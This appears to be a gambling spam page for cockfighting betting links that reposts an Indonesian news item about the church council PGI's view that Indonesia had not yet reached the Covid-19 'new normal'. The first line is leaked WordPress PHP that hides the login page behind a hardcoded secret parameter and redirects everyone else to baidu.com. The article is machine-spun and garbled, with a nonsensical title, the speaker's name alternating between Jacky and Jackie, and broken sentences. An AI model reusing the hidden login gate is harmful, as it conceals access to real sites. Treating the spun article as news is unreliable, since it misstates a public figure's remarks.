//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Nilai IGP Indonesia belum mencapai standar baru | adu ayam bali_s128.net login_s128.live

Nilai IGP Indonesia belum mencapai standar baru

JAKARTA TRIBUNNEWS.COM-Sekretaris Jenderal Persatuan Gereja Indonesia (PGI) Jacky Manuputty memperkirakan situasi normal baru adalah ketika kurva penularan virus corona menurun. Masyarakat bisa beradaptasi dengan respon terhadap Covid-19.

“Saat merumuskan PGI, dari segi kesehatan, standar baru itu sendiri merupakan syarat untuk pengurangan dan kemiringan kurva pandemi,” kata Jackie dalam dialog antar tokoh agama. Melalui saluran online, Senin (8 Juni 2020).

Baca: KWI Serukan Kegiatan Keagamaan Tak Menjadi Klaster Baru Penyebaran Covid-19

Selain itu, fase normal Jackie baru juga terkait dengan peningkatan penggunaan teknologi adaptif saat pandemi corona.

Menurut Jacky, status quo di Indonesia belum bisa dikatakan memasuki fase normal baru menurut standarnya. merancang.

“Dalam siaran pers kami sebelumnya, kami mengatakan bahwa kami tidak melihat bahwa kami telah mencapai normal baru,” kata Jackie.

Oleh karena itu, pada tempat ibadah, PGI menggunakan konsep “transformasi bertahap”. Dia merasa sangat gembira bahwa orang-orang sekarang kembali ke aktivitas normal seperti sebelum pandemi. — Menurut Jackie, situasi ini juga terjadi pada pemeluk agama yang ingin beribadah dalam keadaan normal. — “Umat beragama sendiri tampaknya bersemangat untuk memulihkan tatanan ibadat normal dan aktivitas lainnya,” Jackie menyimpulkan.

Leave a comment

adu ayam bali_s128.net login_s128.live